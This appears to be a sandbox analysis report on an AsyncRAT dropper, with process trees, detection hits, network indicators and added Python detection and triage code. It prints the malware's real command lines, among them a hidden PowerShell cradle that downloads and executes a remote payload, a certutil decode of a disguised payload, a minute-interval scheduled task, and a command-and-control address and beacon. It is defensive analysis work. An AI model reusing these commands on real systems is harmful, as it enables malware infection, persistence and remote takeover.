

Analysis Report xuXIetZvv6.exe

Overview

General Information

Sample Name: xuXIetZvv6.exe
Analysis ID: 391271
MD5: 200cb4b34ea0e61fe8454731bf7a107a
SHA1: a6121f8f7d8600c2278e90d5ae622c9b2d3b410b
SHA256: 3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3
Tags: exe, Vjw0rm

Detection

AsyncRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Drops PE files to the startup folder
Drops VBS files to the startup folder
Dynamically executes javascript script code
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample or dropped binary is a compiled AutoHotkey binary
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Parent Process Executions
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • xuXIetZvv6.exe (PID: 6348 cmdline: 'C:\Users\user\Desktop\xuXIetZvv6.exe' MD5: 200CB4B34EA0E61FE8454731BF7A107A)
    • cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cacls.exe (PID: 6648 cmdline: 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system' MD5: 30C3BBEA1544A7E3EC2103931AEF98FF)
      • certutil.exe (PID: 6712 cmdline: certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: EB199893441CED4BBBCB547FE411CF2D)
      • attrib.exe (PID: 6912 cmdline: attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • Ne - Copy.exe (PID: 6568 cmdline: 'C:\Users\user\AppData\Roaming\Ne - Copy.exe' MD5: A4A1FA7769DF7C47A6D69FB66AA1EB30)
      • conhost.exe (PID: 6720 cmdline: C:\ProgramData/conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)
        • schtasks.exe (PID: 6876 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wscript.exe (PID: 6704 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 6748 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • conhost.exe (PID: 6252 cmdline: C:\ProgramData\conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 3020 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 988 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • conhost.exe (PID: 5440 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 5364 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • conhost.exe (PID: 6652 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 6948 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • conhost.exe (PID: 1260 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author
xuXIetZvv6.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Dropped Files

Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp | SUSP_certificate_payload | Detects payloads that pretend to be certificates | Didier Stevens, Florian Roth
  • 0x0:$re1: -----BEGIN CERTIFICATE-----
C:\Users\user\AppData\Roaming\winlogon.vbs | Molerats_Jul17_Sample_5 | Detects Molerats sample - July 2017 | Florian Roth
  • 0x469:$a1: Net.WebClient).DowNloAdSTRiNg
  • 0x497:$a2: gist.githubusercontent.com
C:\Users\user\AppData\Roaming\winlogon.vbs | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth
  • 0x8da:$a1: certutil -decode
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs | Molerats_Jul17_Sample_5 | Detects Molerats sample - July 2017 | Florian Roth
  • 0x469:$a1: Net.WebClient).DowNloAdSTRiNg
  • 0x497:$a2: gist.githubusercontent.com
(1 further entry is collapsed in the report and not included here)

Note on the Molerats_Jul17_Sample_5 hits: the rule fires on two generic strings (a mixed-case DownloadString call and the gist.githubusercontent.com host), so the match indicates a shared PowerShell download-cradle pattern, not attribution of this sample to that group.

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp | Molerats_Jul17_Sample_5 | Detects Molerats sample - July 2017 | Florian Roth
  • 0x10d1:$a1: Net.WebClient).DowNloAdSTRiNg
  • 0x1731:$a1: Net.WebClient).DowNloAdSTRiNg
  • 0x10ff:$a2: gist.githubusercontent.com
  • 0x175f:$a2: gist.githubusercontent.com
00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
(12 further entries are collapsed in the report and not included here)

Unpacked PEs

Source | Rule | Description | Author
0.2.xuXIetZvv6.exe.8285a2.2.unpack | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
14.2.powershell.exe.13385685750.3.raw.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.2.xuXIetZvv6.exe.8285a2.2.raw.unpack | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
14.2.powershell.exe.1339cff0000.6.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.0.xuXIetZvv6.exe.8285a2.2.unpack | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
(7 further entries are collapsed in the report and not included here)
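The SUSP_certificate_payload hit on localuse.tmp and the `certutil -decode` line in DVDFabPlayer5Activator.cmd describe the same trick: certutil base64-decodes whatever sits between the BEGIN/END CERTIFICATE lines and never checks that the result is an X.509 object. The following triage check is an added example, not code from the report or from the rule authors; the "fake certificate" it decodes is a constructed stub (an MZ header followed by padding), not the real localuse.tmp payload.

```python
"""Triage a PEM "certificate" by checking whether its payload is really DER.

Added example, not part of the sandbox report. SAMPLE_FAKE_CERT is a
constructed stand-in for localuse.tmp: a few bytes of MZ header wrapped in
certificate armour, the shape that certutil -decode happily unpacks.
"""
import base64
import re
from typing import Optional

PEM_RE = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)


def build_pem(payload: bytes) -> bytes:
    """Wrap arbitrary bytes in certificate armour (what the dropper's author did)."""
    return (b"-----BEGIN CERTIFICATE-----\n"
            + base64.encodebytes(payload)
            + b"-----END CERTIFICATE-----\n")


def extract_pem_payload(data: bytes) -> Optional[bytes]:
    """Return the base64-decoded bytes between the markers, or None if not PEM."""
    m = PEM_RE.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(re.sub(rb"\s+", b"", m.group(1)), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def looks_like_der_certificate(payload: bytes) -> bool:
    """A DER certificate is a SEQUENCE (0x30) whose length covers the whole blob."""
    if len(payload) < 2 or payload[0] != 0x30:
        return False
    first = payload[1]
    if first < 0x80:                      # short-form length
        length, header = first, 2
    else:                                 # long-form: 0x8n, then n length bytes
        n = first & 0x7F
        if n == 0 or n > 4 or len(payload) < 2 + n:
            return False
        length, header = int.from_bytes(payload[2:2 + n], "big"), 2 + n
    return header + length == len(payload)


def classify_pem(data: bytes) -> str:
    """'certificate', 'pe-executable', 'unknown-blob' or 'not-pem'."""
    payload = extract_pem_payload(data)
    if payload is None:
        return "not-pem"
    if looks_like_der_certificate(payload):
        return "certificate"
    if payload[:2] == b"MZ":
        return "pe-executable"
    return "unknown-blob"


# Constructed stub: MZ header, padding, a PE signature. Not a runnable binary.
SAMPLE_FAKE_CERT = build_pem(b"MZ" + b"\x90" * 60 + b"PE\x00\x00")

if __name__ == "__main__":
    print(classify_pem(SAMPLE_FAKE_CERT))
```

The same check applies to any file that certutil, PowerShell or a script decodes from base64: run it on the decoded output rather than trusting the armour, and treat anything whose payload is not a DER SEQUENCE as a dropped artefact to be hashed and scanned.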

                        Sigma Overview

                        System Summary:

Sigma detected: Drops script at startup location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6888, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs
Sigma detected: Conhost Parent Process Executions
Source: Process started | Author: omkar72 | Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\ProgramData/conhost.exe, ParentImage: C:\ProgramData\conhost.exe, ParentProcessId: 6720, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, ProcessId: 6876
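The process tree and the two Sigma hits above give the behaviours worth alerting on: a script written into the Startup folder, a child of a conhost.exe that does not live in System32, a scheduled task that re-runs every minute, WScript launching PowerShell, a WebClient-plus-IEX download cradle, and certutil -decode. The rules below are an added example, not the report's or any Sigma repository's code; the events are constructed Sysmon-style records whose values are copied from the process tree, with Sysmon's field names (EventID, Image, ParentImage, CommandLine, TargetFilename, ProcessId) assumed.

```python
"""Detection rules for the persistence and LOLBin chain in this report.

Added example (not part of the sandbox report). SAMPLE_EVENTS are constructed
Sysmon-style records: values come from the process tree, field names follow
Sysmon conventions, and the last two events are benign controls.
"""
import ntpath
import re
from typing import Callable

SYSTEM32 = r"c:\windows\system32"
STARTUP_DIR = "\\start menu\\programs\\startup\\"
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".cmd", ".bat", ".ps1")
MINUTE_TASK = re.compile(r"/sc\s+minute\s+/mo\s+1\b", re.I)
EXEC_CRADLE = re.compile(r"\biex\b|invoke-expression", re.I)
CERTUTIL_DECODE = re.compile(r"\s-(decode|decodehex)\b", re.I)


def _norm(path: str) -> str:
    # Lower-case and unify separators: the loader was started as
    # C:\ProgramData/conhost.exe (forward slash), which defeats naive matching.
    return path.replace("/", "\\").lower()


def _base(path: str) -> str:
    return ntpath.basename(_norm(path))


def drops_script_at_startup(ev: dict) -> bool:
    # Sysmon EventID 11 (FileCreate) of a script inside any Startup folder.
    if ev.get("EventID") != 11:
        return False
    target = _norm(ev.get("TargetFilename", ""))
    return STARTUP_DIR in target and target.endswith(SCRIPT_EXT)


def conhost_parent_outside_system32(ev: dict) -> bool:
    # The real conhost.exe spawns nothing; a "conhost.exe" parent outside
    # System32 is a masquerading binary (here: C:\ProgramData and Startup).
    if ev.get("EventID") != 1:
        return False
    parent = _norm(ev.get("ParentImage", ""))
    return ntpath.basename(parent) == "conhost.exe" and ntpath.dirname(parent) != SYSTEM32


def minute_schtask(ev: dict) -> bool:
    return (ev.get("EventID") == 1
            and _base(ev.get("Image", "")) == "schtasks.exe"
            and MINUTE_TASK.search(ev.get("CommandLine", "")) is not None)


def powershell_download_cradle(ev: dict) -> bool:
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) != "powershell.exe":
        return False
    cmd = ev.get("CommandLine", "").lower()
    downloads = any(k in cmd for k in ("net.webclient", "downloadstring", "openread", "invoke-webrequest"))
    return downloads and EXEC_CRADLE.search(cmd) is not None


def wscript_spawns_powershell(ev: dict) -> bool:
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage", "")) in ("wscript.exe", "cscript.exe")
            and _base(ev.get("Image", "")) == "powershell.exe")


def certutil_decode(ev: dict) -> bool:
    return (ev.get("EventID") == 1
            and _base(ev.get("Image", "")) == "certutil.exe"
            and CERTUTIL_DECODE.search(ev.get("CommandLine", "")) is not None)


RULES: list[tuple[str, Callable[[dict], bool]]] = [
    ("drops_script_at_startup", drops_script_at_startup),
    ("conhost_parent_outside_system32", conhost_parent_outside_system32),
    ("minute_schtask", minute_schtask),
    ("powershell_download_cradle", powershell_download_cradle),
    ("wscript_spawns_powershell", wscript_spawns_powershell),
    ("certutil_decode", certutil_decode),
]


def run_rules(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule_name, ProcessId) for every rule that fires on every event."""
    return [(name, ev["ProcessId"]) for ev in events for name, rule in RULES if rule(ev)]


SAMPLE_EVENTS = [  # constructed from the process tree; not raw Sysmon output
    {"EventID": 11, "ProcessId": 6888, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs"},
    {"EventID": 1, "ProcessId": 6876, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\ProgramData/conhost.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr C:\ProgramData\conhost.exe'},
    {"EventID": 1, "ProcessId": 6920, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');IEX $results"},
    {"EventID": 1, "ProcessId": 6712, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'certutil -decode "C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp" "C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"'},
    {"EventID": 1, "ProcessId": 6556, "Image": r"C:\Windows\System32\conhost.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},  # benign
    {"EventID": 11, "ProcessId": 4242, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Documents\notes.txt"},  # benign
]

if __name__ == "__main__":
    for name, pid in run_rules(SAMPLE_EVENTS):
        print(f"{name:34s} pid={pid}")
```

Two rules fire on the same schtasks event (PID 6876): the parent check catches the masquerading conhost.exe regardless of what it launches, and the minute-interval check catches the task itself even when the loader is renamed. Keeping both is deliberate; a single combined rule would miss whichever half the next variant changes.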

                        Signature Overview


                        AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Metadefender: Detection: 26%
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: xuXIetZvv6.exe | Virustotal: Detection: 54%
Source: xuXIetZvv6.exe | Metadefender: Detection: 23%
Source: xuXIetZvv6.exe | ReversingLabs: Detection: 55%
Machine Learning detection for sample
Source: xuXIetZvv6.exe | Joe Sandbox ML: detected
Source: xuXIetZvv6.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: xuXIetZvv6.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
                        Source: Binary string: scrrun.pdb source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
                        Source: Binary string: C:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, Ne - Copy.exe, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
                        Source: Binary string: EC:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
                        Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
                        Source: Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
                        Source: Binary string: wshom.pdb source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
                        Source: Binary string: scrrun.pdbUGP source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
Source: C:\ProgramData\conhost.exe | Code function: 8_2_00007FF7AB002E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe | Code function: 39_2_00007FF772C32E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\conhost.exe | File opened: C:\Users\user\AppData

                        Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 46.1.54.174:87 -> 192.168.2.5:49715
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 77
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 77
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 77
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 77
Source: unknown | Network traffic detected: HTTP traffic on port 77 -> 49709
Source: global traffic | TCP traffic: 192.168.2.5:49709 -> 46.1.54.174:77
Source: Joe Sandbox View | IP Address: 46.1.54.174
Source: Joe Sandbox View | ASN Name: MILLENICOM-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 46.1.54.174 (identical entry repeated 50 times in the report)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe | Code function: 3_2_000000014007D8A0 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,
Source: unknown | DNS traffic detected: queries for: www.uplooder.net
Source: unknown | HTTP traffic detected:
  POST /Vre HTTP/1.1
  Accept: */*
  User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\
  Accept-Language: en-us
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: 46.1.54.174:77
  Content-Length: 0
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, conhost.exe, 00000011.00000002.494441942.0000027803EF3000.00000004.00000001.sdmp | String found in binary or memory: http://46.1.54.174/
Source: conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp | String found in binary or memory: http://46.1.54.174/t
Source: conhost.exe, 00000011.00000003.246613450.0000027803CEA000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.244935879.00000278037FB000.00000004.00000001.sdmp | String found in binary or memory: http://46.1.54.174:77/
